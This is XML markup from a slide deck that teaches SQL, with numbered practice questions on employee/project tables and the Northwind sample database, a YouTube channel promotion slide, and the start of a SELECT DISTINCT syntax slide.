          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255975" y="235350"/>
            <a:ext cx="85206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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2720">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Questions:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3247" name="Google Shape;3247;p523"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140300" y="930675"/>
            <a:ext cx="8857500" cy="40851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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Write an SQL query that returns the project number and name for projects with a budget greater than $100,000. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Write an SQL query that returns all works on records where hours worked is less than 10 and the responsibility is 'Manager'.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Write an SQL query that returns the employees (number and name only) who have a title of 'EE' or 'SA' and make more than $35,000.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Write an SQL query that returns the employees (name only) in department 'D1' ordered by decreasing salary.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Write an SQL query that returns the departments (all fields) ordered by ascending department name.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Write an SQL query that returns the employee name, department name, and employee title.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Write an SQL query that returns the project name, hours worked, and project number for all works on records where hours &gt; 10.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Write an SQL query that returns the project name, department name, and budget for all projects with a budget &lt; $50,000.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Write an SQL query that returns the employee numbers and salaries of all employees in the 'Consulting' department ordered by descending salary.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Write an SQL query that returns the employee name, project name, employee title, and hours for all works on records.</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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1448725"/>
            <a:ext cx="8520600" cy="745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solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>Join my Youtube Channel</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="Google Shape;126;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="23285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400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://youtube.com/oklabsguru</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-43575"/>
            <a:ext cx="9144000" cy="5262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ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="400" name="Google Shape;400;p74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="13694" l="1661" r="34190" t="14978"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2007300" y="893750"/>
            <a:ext cx="5015826" cy="3155399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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1" name="Shape 3251"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3252" name="Google Shape;3252;p524"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270275" y="1400475"/>
            <a:ext cx="8588100" cy="338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solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Consider the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Northwind sample database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sample tables:</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>FLOW/ER Diagram</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3253" name="Google Shape;3253;p524"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="957300" y="611325"/>
            <a:ext cx="73161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SQL Assignments 3</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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pic>
        <p:nvPicPr>
          <p:cNvPr id="3258" name="Google Shape;3258;p525"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1621438" y="152400"/>
            <a:ext cx="6291074" cy="4838699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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526"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="664525" y="241500"/>
            <a:ext cx="6875400" cy="49020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Select all columns from the Customers table.</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Select only the distinct countries from the Customers table.</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Count the number of orders in the Orders table.</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Select the product names and prices from the Products table.</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Find the total quantity of products in the OrderDetails table.</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Select the first 10 rows from the Employees table.</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Find the average price of products in the Products table.</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Select the order ID and order date for all orders in the Orders table.</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Find the customer with the highest order amount.</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List the employees who have the letter 'a' in their last name.</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Select the product name, category, and supplier for all products.</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Find the number of customers in each country.</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200"/>
              <a:t>List the products with a price greater than $50.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Count the number of products in each category.</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Select the orders placed in 1997.</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Find the average unit price for each category.</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Select the customer names and the total amount they have spent on orders.</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List the employees who were born after 1960.</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Select the 5 most expensive products.</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Find the total revenue generated by the company.</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List the customers who have not placed any orders.</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Select the products that have been ordered at least 5 times.</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Find the order with the highest total amount.</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Select the products with a price between $20 and $50.</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>List the orders placed by the customer with CustomerID 'ALFKI'.</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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7" name="Shape 3267"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3268" name="Google Shape;3268;p527"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="664525" y="241500"/>
            <a:ext cx="6875400" cy="4902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Roboto"/>
              <a:buAutoNum type="arabicPeriod" startAt="26"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Find the employee who has the most orders.</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Select the product names and the number of times they have been ordered.</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Find the total quantity of each product sold.</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Select the orders placed by customers from the USA.</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List the customers and the number of orders they have placed.</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Select the employee names and the number of orders they have processed.</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Find the products that have not been ordered.</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Retrieve the product with the lowest stock level.</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Count the number of orders placed by each customer.</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List the employees who have not processed any orders.</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Retrieve the product categories with the highest average product price.</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List the products that have been ordered the most.</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Find the total number of products sold.</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Retrieve the customer who has placed the most orders.</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List the orders that were shipped after the requested ship date.</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Calculate the total cost of each order (sum of product prices times quantity).</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Retrieve the products with names starting with 'C'.</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List the customers and the total number of orders they have placed, ordered by the number of orders in descending order.</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Find the average quantity of products sold for each category.</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Retrieve the customers who have placed orders in 1997.</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startAt="26"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>List the employees and the total sales amount they have processed.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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2" name="Shape 3272"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3273" name="Google Shape;3273;p528"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="664525" y="241500"/>
            <a:ext cx="6875400" cy="4902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Roboto"/>
              <a:buAutoNum type="arabicPeriod" startAt="47"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Retrieve the orders with more than five products in them.</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startAt="47"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>List the products and the number of times they have been ordered.</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startAt="47"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Retrieve the orders with a total cost (sum of product prices times quantity) greater than $500.</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startAt="47"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Find the average price of products in each supplier's catalog.</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startAt="47"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>List the customers who have placed more than one order.</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startAt="47"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Retrieve the orders that have not been shipped.</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startAt="47"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>List the employees and the total revenue from the orders they have processed.</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startAt="47"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Retrieve the orders with a total quantity greater than 100.</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startAt="47"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Find the customers who have placed orders on the same day they registered.</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startAt="47"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>List the products and their total sales amounts.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startAt="47"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Count the number of products in each supplier's catalog.</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AutoNum type="arabicPeriod" startAt="47"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Retrieve the orders that were placed in 1996 and shipped in 1997.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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7" name="Shape 3277"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3278" name="Google Shape;3278;p529"/>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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2733" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>The SQL SELECT DISTINCT Statement</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3133">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3279" name="Google Shape;3279;p5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Syntax</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1950">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT DISTINCT </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1950">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>column1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1950">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1950">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> column2, … </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1950">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1950">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1950">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="1950">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="1550">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2450">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
